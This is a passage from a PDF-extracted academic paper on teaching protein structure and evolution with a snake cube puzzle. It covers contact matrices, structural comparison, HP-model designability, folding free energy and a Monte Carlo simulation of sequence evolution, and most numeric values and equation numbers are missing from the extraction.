algorithm from regions with more restrictive constraints. through the exhaustive search, we find eight solutions for the -mer puzzle that we show in fig. . these solutions will be labelled hereafter as s , s , ..., s . the students can be requested to visually inspect the solutions through standard visualization software such as pymol (delano, ) or vmd (humphrey, dalke & schulten, ). for a review on software for protein structure visualization see o’donoghue et al. ( ). for this exercise, it is necessary to transform the format of the files with spatial coordinates. this gives us the opportunity to discuss the different file formats with their flaws and nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. chain element number . x . x . x . x n um be r o f v is its d ur in g fo ld in g figure number of times that a given rigid fragment is visited by the folding algorithm. the search starts either from the first (blue histogram) or from the last fragment of the chain (red) and explores all maximally compact conformations. positions with blocks of length larger than two are depicted over the histograms. advantages, and to stress the importance of format standardization in bioinformatics (gibas & jambeck, ). the contact matrix at this point, it is convenient to introduce a reduced representation of protein structures that arises naturally in the context of lattice polymers, and that will play an important role in the following: the contact matrix. this binary matrix has value cij = if two units i and j contact each other in space in the polymer conformation, and cij = otherwise: cij = { if dij ≤d otherwise ( ) bonded units (j = i ± ) are excluded from this count because they contact each other in all conformations. in lattice polymers, the condition for contact is that two units are nearest-neighbours in the lattice, i.e., d is the lattice space. we provide the contact matrices of the eight solutions of the snake puzzle in the supplementary material (see ‘data availability’) since they are needed to perform the exercises that we describe in the following. figure shows the four different types of locations that a monomer can occupy within the maximally compact structure and the number of contacts that it has in each case. the same figure also shows an intermediate conformation of two similar solutions, s and s , depicting only their common structure and the first different fragment. the associated contact matrices are represented below, highlighting the differences determined by the alternative positions of the last fragment. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the eight solutions of the -mer puzzle. although the solutions cannot be superimposed, they represent four pairs of mirror images, analogous to naturally occurring enantiomers of chemical sub- stances. in the figure, each pair of related solutions are depicted with the same color (s & s , s & s , s & s , s & s ). the figure was generated using coordinates files in pdb format, whose documentation can be obtained in http://www.wwpdb.org. the source code provided in the supplementary material (see ‘data availability’) outputs pdb files that can be explored using any standard protein structure visualiza- tion software. contact matrices are also used as a simplified representation of real protein structures. two residues i and j are considered in contact if their closest not-hydrogen atoms are closer than a threshold, typically d = . Å (the main reason to exclude hydrogen atoms is that they are often not reported in pdb files obtained with x-ray crystallography). pairs are considered in contact only if |i−j|> , since neighbours along the chain trivially fulfil the contact condition in all conformations. the contact matrix provides a simple visual representation that makes evident secondary structure elements (alpha-helices, appearing as lines of contacts (i,i+ ) and (i,i+ ) parallel to the diagonal; parallel beta sheets, (i,i+l) and anti parallel beta sheets, i+l =const, appearing as lines perpendicular to the diagonal). importantly, the contact matrix is independent of the reference frame used to represent the coordinates. this point gives a good opportunity for a general discussion on the modelling process in biology and its epistemological and practical implications. protein molecules are extremely complex. they are made of thousands of atoms bound together by quantum interactions. although not covalently bound, the water solvent is essential in determining the properties of a protein (dynamics, thermodynamic stability, catalytic function...). if we want to make quantitative predictions, we have to reduce this complexity to a simplified model that is amenable to computation. in a statistical mechanical framework, a simplified (mesoscopic) model must be imagined as the result of integrating out some degrees of freedom of the system (the quantum interactions, the water molecules, the hydrogen atoms, the side chains...) and retaining only those that are either most relevant or simplest nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.wwpdb.org http://dx.doi.org/ . /peerj-cs. figure contact matrix representation. (a) illustration of the four different types of locations where a monomer can be found in a maximally compact structure and the contacts that it will has in each case. a given monomer may have from one to four contacts, with the exception of the first and last monomers, which can present an additional contact up to a maximum of five. (b) conformations and contact matri- ces of two similar solutions s and s . in the conformations, for clarity we show only the part that is com- mon to both solutions and the first fragment that is different. the upper triangular matrix shows the con- tacts of s and s , highlighting in red the contacts present in s that are absent in s (shown in the con- formation s in red as well). the grey shaded area in the matrix corresponds to the monomers not shown in the above conformations. the distance in sequence between the contacts can be seen in the arcs repre- sentation depicted in the left of the matrix. the lower triangular matrix represents the number of shared contacts among the four non-redundant solutions. to handle, allowing quantitative predictions. the contact matrix is one such mesoscopic representation. to define it, we need arbitrary choices (the definition of the distance between residues) and parameters (the threshold distance). this is an unavoidable (and indeed desirable) feature of the modelling process. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. contact energy function nevertheless, although the modelling choices may seem plausible, it is important that they are tested a posteriori for their predicting ability, and that parameters are optimized by comparison with experimental data, if it is possible. in the case of protein contact matrices, predictions are obtained from statistical mechanical models that present a simple contact energy function: e(c,a)= ∑ i<j cijuij ( ) where cij is the contact matrix and uij is the contact interaction energy between residues i and j that are in contact, which may be imagined as the result of averaging out all other degrees of freedom in a thermodynamic ensemble subject to the constraint that i and j are in contact. such implicit computation is of course impossible to realize, and researchers adopt two main types of contact free energy functions. the first type belongs to the broad category of knowledge-based energy functions. in this case, uij depends on the type of amino acids at positions i and j, uij =u(ai,aj), where the sequence ai denote the amino acid type at position i and u(a,b) is a × symmetric interaction matrix derived from large databases of protein structures and sequences, with the aim to rationalize or predict the folding stability of proteins, such as for instance the miazawa and jernigan potential (miyazawa & jernigan, ). the second type belongs to the category of structure-based energy functions, which are determined from each experimentally determined protein native structure in such that the native structure has minimum free energy and that the native state is minimally frustrated, i.e., all native interactions (and only them) are stabilizing, and all pairs of atoms that interact in the native state minimize their interaction energy: uij =−cnatij , where c nat is the native contact matrix. some structure-based models are constructed as an explicit function of the inter-residue distance dij, e = ∑ ijc nat ij fij(dij). the minimum frustration principle (bryngelson & wolynes, ) requires that the minimum of each pairwise interaction fij corresponds to the native distance dnatij . structure-based models are used to predict protein dynamics close to the native structure through normal mode analysis (the so-called elastic network model) (tirion, ; bahar & rader, ) or to predict the thermodynamics and kinetics of the folding process (taketomi, ueda & gō, ) and, despite their simplicity, they provide accurate predictions that are favourably compared to experimental observations, as it can be seen in reviews on these subjects (bastolla, ; chan et al., ). contact order an important quantity that can be computed from the contact matrix is the absolute contact order (aco), defined as: aco= ∑ i<j cij|i−j|∑ i<j cij ( ) nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. i.e., the average distance in sequence between pairs of residues spatially in contact. it has been observed that the aco is negatively correlated with the folding rate of the protein, in such a way that proteins with larger aco tend to fold slower (ivankov et al., ). figure represents the contact order for each of the four solutions of the puzzle. in addition, a more compact representation shows the number of contacts per residue. we find the following aco values: , , and for s , s , s , and s , respectively. the analogy with real proteins suggests that structures s and s fold more slowly, as they present larger contact order. conversely, the folding dynamics of s is expected to be faster and that of s would be intermediate. we also note the presence of common contacts in all four solutions, which are related with more constrained regions, e.g., the contacts involving the two consecutive blocks of length mentioned above. structural comparisons contact overlap another important application of contact matrices consists in comparing two protein structures. for protein structure comparison, as for sequence comparison, the first step consists in determining an alignment, i.e., a correspondence iy =a(ix) between the position ix in protein x and the position iy in protein y. if the two structures correspond to different conformations of the same protein, the alignment is trivial: a(i)= i. here we assume that this is the case, and we will discuss alignment algorithms below. we can measure the similarity between any two polymer structures sx and sy through the contact overlap: contact overlap= ∑ ij c (x) ij c (y) a(i)a(j)√∑ ij c (x) ij ∑ ij c (y) ij . ( ) this measure is zero if the structures do not share any contact, and one if they share all contacts. we can ask the students to compute the contact overlap between all pairs of solutions of the -mer, which are reported in table . it can be noted that several off-diagonal pairs have overlap equal to one, meaning that their contact matrix is exactly the same. this result is puzzling, since our algorithm guarantees that all solutions are different, in the sense that they cannot be superimposed through rigid body rotations or translations. we can ask the students to explain this fact. the answer is that structures with overlap equal to one are related through a mirror reflection—they correspond to chemical enantiomers. it can be shown (see ‘material and methods’) that mirror images can be excluded by the search algorithm through a suitable control of the axes. in the following, we will only consider one of each pair of enantiomers (s , s , s , and s ) to avoid redundancy. figure compares the contact matrices of the structures s and s . a summary of the contacts found for all four non-redundant solutions is also shown. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure network representation of the solutions. the black line represents the chain and each white dot represents an opposite end of the rigid fragment. the distance between dots is proportional to the length of the fragment. each position in the chain is connected with other positions if they are in con- tact in the folded solution. longer arcs have a larger contribution to the contact order. (a) representa- tion for the four non redundant solutions. solutions s and s have contacts with larger contact orders whereas solution s has the shortest. (b) the same representation integrating all four solutions. the width of the arc is proportional to the number of structures sharing the contact. the colour code quantifies the distance between each pair of residues (terms in the numerator of eq. ( )) normalized by the length of the chain (which is the same for all solutions). we note a region of four contacts on the right half of the chain common to all solutions which corresponds to the peak shown in fig. . the number of contacts per residue is shown for each solution, together with the average. note that solution s has the most dissimilar profile. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table pairwise comparison of the solutions of the snake puzzle through the contact overlap. note that there are several off diagonal values with overlap one (perfect similarity) representing non- superposable mirror images. contact overlap s s s s s s s s s . . . . . . . . s . . . . . . . s . . . . . . s . . . . . s . . . . s . . . s . . s . optimal superposition. root mean square deviation at this point, it is interesting to compare the properties of the contact overlap with another measure of structural distance, the root mean square deviation rmsd=minr √ n ∑ i ∣∣∣er(x)i −rer(y)a(i)∣∣∣ , ( ) where er(x)i indicates the coordinates of atom i in structure x, |·| is the euclidean distance, r denotes a rotation matrix that has to be optimized to find the optimal superimposition, and both er(x)i and er (y) i are translated in such a way that their centers of mass stay at the origin. the above formula for the rmsd helps to avoid the confusion between alignment a(i) and superposition r, which is frequent among students. instead of comparing interatomic distances between pairs of atoms as the contact overlap does, the rmsd compares the distances of individual aligned atoms after optimal superimposition, which is apparently simpler. however, this simplification is obtained at the price to determine the optimal rotation matrix r that minimizes the rmsd. this minimization can be performed analytically through the classical algorithm by kabsch based on singular value decomposition. nevertheless, the optimal superimposition is strongly influenced by the aligned atom i that is farther away in the two structures. this determines a trade-off between alignment length and rmsd, since we can decide not to align residues that are too distant, obtaining shorter alignments with smaller rmsd. in this sense, the measure of the rmsd is not uniquely determined unless the alignment is trivial. on the contrary, the contact overlap is independent of the superimposition and, apart for the computation time, it is possible in principle to determine the alignment that maximizes the contact overlap without any arbitrary choice. it is important to note that the rmsd is expected to be only loosely correlated with distances in energy, since flexible regions can produce large rmsd at a small energetic cost. the same transformation is expected to maintain a large contact overlap, since flexible regions are characterized by few contacts (wallin, farwer & bastolla, ). nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. structure alignments after discussing the notion of spatial superposition, we can now discuss the concept of structure alignment. this is easier adopting the contact overlap. in this context, the optimal pairwise alignment a(i) can be defined as the alignment that maximizes the contact overlap eq. ( ). since protein structure is conserved through evolution, we expect that pairs of aligned residues associated through the correspondence a(i) are likely to be evolutionarily related (homologous). it is clear that the algorithm for finding the optimal structure alignment given a scoring scheme will be more complex than the algorithm for finding the optimal sequence alignment that depends only on the similarity between the individual amino acids at positions i and a(i). it can be shown that the structure alignment based on the contact overlap is an np-complete problem, which, loosely speaking, means that no algorithms that runs in polynomial time can guarantee to find the optimal solution in all cases, while for pairwise sequence alignments the optimal solution can be found in polynomial time through dynamic programming. nevertheless, good heuristic algorithms exist, such as the monte carlo algorithm implemented in the structural alignment algorithm dali (holm & sander, ), which is conceptually related to the optimization of the contact overlap. on the other hand, there is no structure alignment method based on the minimization of the rmsd. in fact, when we superimpose two aligned proteins, the optimal superimposition is strongly affected by pairs of residues i,a(i) with large distance, typically located in flexible regions. consequently, the optimal superimposition r may locate far apart atoms in the structural cores of the two proteins for the sake of improving the alignment of outliers. therefore, for distantly related proteins, it is preferable to superimpose only the structural cores, constituted by pairs of residues whose interatomic distance is smaller than a threshold. this introduces a trade-off between the alignment a, the structural superimposition r and the core definition, that must be sorted out through the choice of the threshold and some kind of heuristic, such as in the structure alignment algorithm mammoth (ortiz, strauss & olmea, ). instead of applying a fixed threshold to define the core, the program tmalign computes the average distance between unrelated residues as a function of the protein length, and adopts this function in such a way that only pairs that are closer than expected by chance give a positive contribution to the structural similarity (zhang & skolnick, ). tm-align is one of the most reliable structure alignment programs based on rigid superimposition. notably, methods have been proposed that consider flexible superposition in which different rigid body transformations are applied to different protein domains (e.g., protdeform rocha et al., ). protein structure classification protein structure comparison may also be a convenient point for introducing protein structure evolution. we will base our analysis on protein superfamilies, groups of bona fide evolutionarily related protein domains that are structurally similar and can be found in structural classification databases such as scop (murzin et al., ) and cath (orengo et al., ). nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. comparing proteins within a superfamily, it was found that protein structure and protein sequence divergence are linearly related. this result has been established based on the rmsd of aligned and superimposed protein cores (chothia & lesk, ) and later extended to other measures of structural change, allowing to quantify the statement that protein structure is more conserved than protein sequence (illergård, ardell & elofsson, ). in this context, our group introduced the contact divergence (cd) (pascual-garcía et al., ), a measure of structural divergence derived from the contact overlap, and analogous to the poisson distance between protein sequences, in such a way that the cd is expected to be related with the time during which proteins diverged in evolution. by comparing the contact divergence in protein structure space with the poissonian distance between the corresponding sequences, we found that structure evolution is slower than sequence evolution by a factor that ranges from . to . for different superfamilies (pascual-garcía et al., ). importantly, proteins that conserve exactly the same molecular function appear to be limited in their cd, which suggests that homology modelling can be rather successful in the case of function conservation, while structure evolution is more irregular and the cd explodes for proteins that change their molecular function. the notion that protein structures may be largely different within the same superfamily leads to challenge the concept that protein structure space is organized in discrete regions called ‘‘folds’’ that represent well-defined equivalence classes of protein structures, an idea that underlies most structural classifications of proteins (orengo et al., ; murzin et al., ; holm & sander, ). more recently, it is gaining force an alternative view that sees protein structure space as constituted by discrete folds only at very high similarity, while at low similarity structure space is continuous and should be described as a network rather than as a tree. (dokholyan, shakhnovich & shakhnovich, ; pascual-garcía et al., ; skolnick et al., ; sadreyev, kim & grishin, ). sequence-structure relationship and protein designability the key to protein evolution is the relationship between the protein sequence, which evolves through time, and protein structure and function. the very simple models presented in this unit can constitute a suitable introduction for such a subject. we can define the sequence structure relationship within the contact energy model of eq. ( ) where a contact matrix cij represents the mesoscopic state made of all structures with contact matrix cij, and eq. ( ) represents its effective free energy, with all other degrees of freedom averaged out. in principle the effective energy depends on the temperature and the state of the solvent, but these dependencies will be kept implicit. we assume that the contact interaction energies depend on the protein sequence as uij =u(ai,aj), where ai denotes the amino acid type at position i. to keep things simplest, we consider the hp model that groups the amino acid in two types, hydrophobic (h) and polar (p). more realistic models consider the twenty natural amino acid types and contact interaction energies with parameters. this simple hp model is sufficient to reproduce many qualitative features of protein folding. indeed, hydrophobicity is considered as the main force that nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. stabilizes folded proteins. we adopt the parametrization suggested by li et al. ( ), with u(h,h)=− . , u(h,p)=− , and u(p,p)= , which satisfy the following physical constraints: ( ) more compact conformations with more contacts have lower energies, ( ) hydrophobic monomers are buried as much as possible and ( ) different types of monomers tend to segregate, which is achieved if u(h,p)>u(h,h)+u(p,p). for a given sequence, the ground state of this model is the contact matrix with the lowest effective energy among all physically feasible contact matrices that satisfy the strong conditions of chain connectivity, excluded volume (the self-avoiding interactions) and secondary structure (if we consider real protein structures). while the number of all possible contact matrices is huge (of the order of l ), most of them are unfeasible since the number of self-avoiding walks increases only exponentially with the number of monomers l. as a model of feasible contact matrices, we can consider the contact matrices of compact self avoiding walks on the cubic lattice or the contact matrices of real protein structures. here, for the sake of simplicity, we will limit our computations to the solutions of the snake puzzle. this is analogous to the toy model of protein folding based on the maximally compact structures on the cubic lattice introduced by shakhnovich and coworkers in the ’s (shakhnovich & gutin, ). as suggested by several works, we identify the native state of a protein sequence with the ground state of its effective energy (more realistic models also impose conditions on the stability with respect to alternative compact conformations, as we will see in the following). this allows us to define the designability of a given structure as the number of sequences for which this structure is the ground state. more designable structures are expected to be more resistant to sequence mutations. mutational robustness has been proposed to be important to reduce the deleterious effects of erroneous protein translation in the ribosomes (drummond & wilke, ) and to mitigate the mutation load determined by unviable offsprings generated under strong mutation rate (bloom et al., ; lauring, frydman & andino, ). furthermore, it has been shown that robustness favours the evolution of new protein functions (soskine & tawfik, ). similar considerations motivated the computational study by li et al. ( ), who considered as feasible states the contact matrices of the maximally compact self avoiding walks of steps on the cubic lattice, whose number is ∼ (shakhnovich & gutin, ) and evaluated their designability in the space of the sequences of h and p. here we propose that the students reproduce this computation, adopting as feasible structures three of the solutions of the snake puzzle: s , s or s . we discard the solution s because it is very similar to s (see the contact overlap values in table ) and it should be considered part of its native valley rather than an alternative conformation. figure shows the results for the three structures considered for an increasing number of sequences (see ‘materials and methods’). li et al. ( ) observed that the distribution for the number of structures with s sequences decays exponentially with s, which means that there are few structures with high designability and many with low designability. of course three structures are too few to test this behaviour, but it is interesting that there are nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. number of sequences generated % s eq ue nc es a ss ig ne d structure structure structure figure designability of selected structures for an increasing number of random sequences. we ob- serve significant differences between the structures that tends to a well defined limit when the number of sequences increases. important differences between the three structures, and s stands out as more designable than the rest. this exercise allows us to emphasize the importance to assess the statistical significance and statistical errors in computational studies. the differences that we observe are relevant only if they are statistically significant, i.e., if the probability that they arise by chance is lower than a predetermined threshold (typically, . ). we propose two methods to verify that they are indeed significant. the first one, more rigorous, is based on the binomial distribution: given any structure a, we can compute the probability that the number of sequences assigned to a, sa over a total of s that were tested, is the result of s tests with success probability / , as if all structures have the same probability. if all these probabilities are small, then the designabilities are significantly different. the second method, easier to apply in general, consists in computing the standard error of the mean of the designability pa, sa = √ pa( −pa)/s, and performing an unpaired z-test with z = (pa−pb)/ √ s a+s b for all pairs of structures. with . as significance threshold, the binomial test finds the difference from equal frequencies not significant for s≤ (except for s ) but significant for s≥ , for all structures. the z test yields the same result (in this case, s is not significant for s= ). misfolding stability and energy gap it has been noted in several works that the analogy between the polymer model and protein folding only makes sense if the ground state structure, identified as the native state, is nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. much more stable than alternative structures, which collectively represent the misfolded ensemble. one of the first parameters used to assess the stability of the putative native state has been the energy gap between the putative native state and the misfolded conformation with minimum energy among those not in the attraction basin of the native state (sali et al., ). if this gap is small, the native state lacks thermodynamic stability, since a small change in the parameters of the effective energy function, corresponding to a change of temperature or ph, would produce a different ground state; it lacks stability against mutations in the sequence, for similar reasons; and it is very difficult to reach kinetically, since the dynamics of the model polymer can become trapped in low energy conformations outside the native basin. in their work cited above, li et al. ( ) found that more designable structures have a larger energy gap, and that the energy gap averaged over the sequences assigned to a given structure clearly separates the maximally designable structures from the rest. in our toy model there is one ‘‘native’’ and only two ‘‘misfolded’’ conformations. we denote by e(ci,ak) the effective energy of sequence ak in structure i, and we define the energy gap as the effective energy difference between the ’’native’’ structure and the alternative conformation with lowest energy δe(ci,ak)=e(ci,ak)−min j =i e(cj,ak). ( ) this quantity has then to be averaged over all sequences ak assigned to structure ci, which we denote with an overline: δe(ci)=e(ci,ak)−min j e(cj,ak)(j = i). ( ) the values of the average energy gap are shown in fig. . we can see that, consistently with the results reported by li et al. ( ) the structure s has both the highest designability and the largest energy gap, and that these differences are significant. we can then ask students whether this correlation between designability and energy gap is surprising or it should be expected based on the definitions. another measure of the stability of the misfolded ensemble, more standard under the point of view of statistical mechanics, is its free energy, which can be evaluated through some simplified statistical mechanical model. we assume that the protein can exist in three macroscopic states: the native state (the attraction basin of the contact matrix with minimum effective energy, which can be described for instance through the structure-based elastic network model mentioned above), the unfolded state (analogous to the self-avoiding-walk model, with large conformation entropy and effective contact energy close to zero), and the misfolded state (alternative compact conformations dissimilar enough from the native structure). we describe each of these states (native, misfolded and unfolded) by a free energy which, at constant pressure and volume, is given by the difference between the total energy e and the conformational entropy s multiplied by the absolute temperature, i.e., the helmholtz free energy g=e−ts. furthermore, the helmholtz free energy is proportional to the logarithm nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. structure identifier . . a ve ra ge e ne rg y ga p figure average energy gap for the three chosen structures, s (green), s (orange) and s (pink). the structure s shows a significantly higher value than the others. of the partition function g=−kbt logz of the canonical ensemble, an important equation that permits to relate macroscopic thermodynamic quantities with the microscopic details encoded in the partition function z. in the following, we show how the free energies of the different states can be estimated, and how we can define the folding free energy of the model polymer g as the difference between the free energy of the native state and that of the unfolded plus misfolded state (the non-native state). this gives us the opportunity to stress that both unfolding and misfolding are important and should be taken into account. we approximate the free energy of the native state as its effective contact energy, gnat(a)= ∑ i<jc nat ij u(ai,aj) where c nat ij indicates the contact matrix of the native structure. note that we should also take into account the conformational entropy of the native state, derived from the volume in phase space of the structures that share the native contact matrix, but this conformational entropy is expected to be similar to that of misfolded contact matrices (karplus, ichiye & pettitt, ), so that it contributes little to g. the free energy of the unfolded state is approximated as its conformational entropy, which is proportional to the number of residues (for instance, for a self avoiding walk of l steps with µl conformations the free energy would be gunf=−kbtllogµ). for a more realistic model, we should consider the number of degrees of freedom that are not frozen (typically, the torsion angles phi and psi of the main chain and chi of the side chains) and the limitations to their movement imposed by atomic interactions, in particular the repulsion that motivates the self-avoiding-walk model. an approximation that is often used is gunf(a)=t ∑ is(ai), where the conformational entropy of residue ai, s(ai), is an empirical value that mainly depends on its number of chi angles. nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the term that is most difficult to estimate, and that is often neglected in computational models despite its importance, is the free energy of the misfolded state. in the context of the contact energy model, this term can be estimated exploiting the analogy with the random energy model (rem) (derrida, ). for an analysis of the selective pressures dictated by stability against misfolding and predicted through the rem approximation, see minning, porto & bastolla ( ). the first term of the free energy expansion of the rem is just the average effective energy of alternative conformations, which is very simple to compute. we denote by 〈·〉 the average over the ensemble of alternative compact conformations, and we approximate the free energy of the misfolded ensemble as the average energy of misfolded contact matrices, gmisf(a)= ∑ i<j 〈cij〉u(ai,aj)≈ nc l(l− ) ∑ i<j u(ai,aj) ( ) where 〈cij〉 denotes the average value of the contact between residues i and j in the misfolded ensemble, and we adopt the approximation that all such average contacts are equal and the average number of contacts of misfolded structures is equal to the number of contacts of the native structure, ∑ i<j〈cij〉=nc. in real polymers, 〈cij〉 decreases with the sequence distance between the two residues in contact, ∣∣i−j∣∣, as predicted by polymer physics, and as it can be verified through a statistical analysis of the pdb, but we neglect this dependence for simplicity. next, we combine the misfolded and unfolded states into a single non-native state containing both states separated by an energy barrier, which we describe with the partition function znonat = ( e−βgmisf+e−βgunf ) . we define the folding free energy g as the difference between the native and non-native free energy states, g(a)=gnat+kbt log(znonat) ( ) where β= /kbt is the boltzmann factor. finally, we assume that the free energy of the misfolded ensemble is much more negative than that of the unfolded ensemble, which will be neglected. thus, we estimate the folding free energy as g(a)= ∑ i<j cnatij u(ai,aj)− nc l(l− ) ∑ i<j u(ai,aj) . ( ) we will adopt the above free energy for the model of protein evolution described in the next section. in the context of evolution, we call positive design the selective forces that make the first term of the above equation more negative, increasing the stability of the native state against that of the unfolded state, and negative design (berezovsky, zeldovich & shakhnovich, ; noivirt-brik, horovitz & unger, ) the selective forces that make the second term of the above equation more positive, decreasing the stability of the misfolded ensemble (which, as it is important to note, is independent of the native state). protein evolution pursues both positive and negative design at the same time. however, positive and negative design may have contrasting requirements. hydrophobicity is recognized as the main nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. force underlying protein folding. increasing hydrophobicity favours positive design, since the native energy becomes more negative, but it contrasts negative design, since the free energy of the misfolded ensemble becomes negative as well (and at a faster pace than the native energy, since the rem free energy has a term proportional to the mean square energy of alternative conformations). evolution has to finely balance these two selective forces, and the balance depends on the mutation bias, i.e., on whether mutation favour hydrophobic or polar amino acids (méndez et al., ). we will illustrate these issues and their interplay with other evolutionary forces such as mutation bias and population size with the computational exercise proposed in next section. structurally constrained sequence evolution the main point we address here is that the thermodynamic properties of folding observed in natural proteins are a consequence of the evolutionary process, consisting of mutation and selection. with the aim to ‘‘bring molecules back into molecular evolution’’ (wilke, ), we will show how protein evolution is jointly constrained by evolutionary parameters (mutation bias, population size, temperature) and the requirement to fold into the target native structure. from a didactic point of view, protein evolution offers a valuable opportunity to illustrate the essence of statistical mechanics in a way that is intuitive for biologists. the evolutionary model described here can be interpreted as a statistical mechanical model in the space of the protein sequences constrained by the requirement of the stability of the native state. our evolutionary model considers a genetically homogeneous population, i.e., we assume that the mutation rate is very small. it is important to distinguish between a mutation, which is a microscopic event that affects individuals, and a mutation that becomes fixed in the population (often called substitution, although this term would only be used for amino acid or nucleotide changes and not for insertions and deletions), which is the macroscopic event that interests us here. every time a mutation occurs in a sequence a, it may either disappear or get fixed in the population with a probability pfix that depends on its fitness relative to the wild type and on the population size n , pfix(a→a ′)= ( f (a)/f (a′) ) − ( f (a)/f (a′) )n − . ( ) where a′ is the mutant sequence. it is often assumed that the fitness depends on the stability of the native state and is proportional to the fraction of proteins that are folded at the thermodynamic equilibrium (goldstein, ; serohijos & shakhnovich, ) f (a)= e−β g(a) +e−β g(a) ( ) where g(a) is modelled for instance as in eq. ( ) and β = /kbt is the inverse of temperature. although other properties—in particular the dynamics of the protein, its capacity to interact with other proteins, its catalytic rate and so on—are arguably more important than its stability, they are more difficult to model, and the stability is a necessary nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. prerequisite at least for the large number of proteins that must be folded in order to function (i.e., excluding natively unfolded proteins). if the mutation is disadvantageous, i.e., f (a′)< f (a), corresponding to a lower stability, the probability that it becomes fixed is exponentially small with population size, but it is non-zero if log f (a)−log f (a′) is of the order of /n . in other words, the smaller is the population, the more tolerant it is to mutations that decrease the fitness. analogously, a thermodynamic system is more tolerant to changes that increase its energy the higher is its temperature. this analogy can be made more meaningful if we consider the evolutionary trajectory as a random walk in the space of the possible sequences (sella & hirsh, ). more precisely, it is a markov process, since the probability to jump to sequence a′ at time t+ only depends on the sequence visited by the population at the previous time t. in our opinion, the image of a homogeneous population jumping in the space of possible genotypes through random mutations subject to an acceptance probability—that depends on fitness differences and on population size—makes more intuitive the abstract concept of a markov process. a remarkable property of markov processes is that, under not very restrictive mathematical conditions, after a large enough time they converge to a limit distribution over their phase space. this limit distribution is easy to compute if the markov process has a mathematical property called detailed balance, or reversibility in the molecular evolution literature and is the basis of the utility of markov processes in statistical mechanics. in fact, the boltzmann distribution in conformation space, which can be expressed mathematically as p(c)= z exp(−βe(c)), being e(c) the energy of the conformation c and z the partition function, cannot be analytically computed given the impossibility to compute the partition function when the system is highly dimensional. the monte carlo method consists in simulating a markov process that fulfills detailed balance such that the limit distribution coincides with the boltzmann distribution, in such a way that averages over the boltzmann distribution can be substituted by averages over the markov process. this situation has a parallel in molecular evolution. in this case, our starting point is the transition probability of the markov process (in the limit of a homogeneous population), from which we can easily compute the limit distribution in sequence space exploiting the detailed balance. sella & hirsh ( ) noted that this limit distribution has the form p(a)= z e n logf (a), i.e., sequences with higher fitness are visited more often during the course of evolution, as we expect, and the prevalence of sequences with large fitness is modulated with a probability that depends on population size. strikingly, there is a strong formal analogy between this limit distribution in sequence space and the boltzmann distribution in structure space. firstly, there is a correspondence between fitness and minus energy where sequences with larger fitness are visited more often, in analogy with structures with lower energy that are observed more often. secondly, there is another interesting correspondence between the effective population size and the inverse of the temperature, implying that small populations are more tolerant to sequences with low fitness in the same way in which systems with large temperature are more tolerant to structures with high energy. we think that this analogy can help the intuitive understanding of the basis nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. of statistical mechanics for biologists, and can transmit key evolutionary concepts to physicists. this introduction motivates the following exercise, which consists in simulating the evolution of a homogeneous population with size n , subject to random mutations with a given bias and selection on protein stability. as target native structure, we choose one of the solutions of the snake cube. the random process that we simulate consists of four steps: . mutation one of the positions of the sequence is randomly chosen and mutated from h to p or viceversa. we consider that mutation bias, i.e., the rate of mutation from h to p and from p to h may be different. this bias is parametrized with a parameter p that expresses the ratio between the rate at which an amino acid of type h mutates to p and the rate at which p mutates to h (this parameter suffices since the total mutation rate only affects the time scale of the problem). we extract the mutant site in two steps. firstly, we extract a random number to decide whether the mutation is from h to p (probability php =pnh/(pnh+( −p)np), where nh is the number of positions occupied by a h) or viceversa. then, we extract with uniform probability one of the nh sites if the mutation is from h to p, or one of the np sites otherwise. . fitness evaluation we compute the folding free energy of the mutated sequence at temperature t with eq. ( ). the computation can be accelerated noting that only terms involving the mutated residue change. the fitness is then evaluated with eq. ( ). . selection we compute the fixation probability, eq. ( ), and we extract a random number to decide whether the mutated sequence get fixed or is eliminated. . sampling finally, we take statistics of the relevant quantities (fitness, g). if the mutation is accepted we use the new sequence, otherwise we use the previous wild type sequence. it is of course important to remember to update the counts even if the sequence does not change. starting from a random sequence, stability and fitness tend to increase on average, although with large fluctuations. we are interested in the stationary properties at large time, when the limit distribution is reached and the memory of the starting random sequence is lost. we propose to use the following method to numerically estimate the stationary value of the fitness. we define the average fitness at time t, f(t) as f(t)= t t∑ k= f (a(k)) . ( ) we now assume that the average fitness f tends to its stationary value exponentially, f(t)≈f( )+(f∞−f( )) ( −e− t τ ) . ( ) this assumption allows us to derive the parameters in which we are interested, f∞ (stationary fitness) and τ (time scale) through the linear fit of y =f(t+ )−f( ) versus nido et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. x =f(t)−f( ): (f(t+ )−f( ))=(f(t)−f( ))e− /τ +(f∞−f( ))( −e − /τ). ( ) the slope of the fit gives τ and the intercept gives f∞. this computation allows us to discuss the advantages of analytical methods such as linear fit with respect to other alternatives. an alternative method for computing f∞ consists in discarding the first t steps of the simulation and using only the last steps to compute the average. however, it is difficult to be 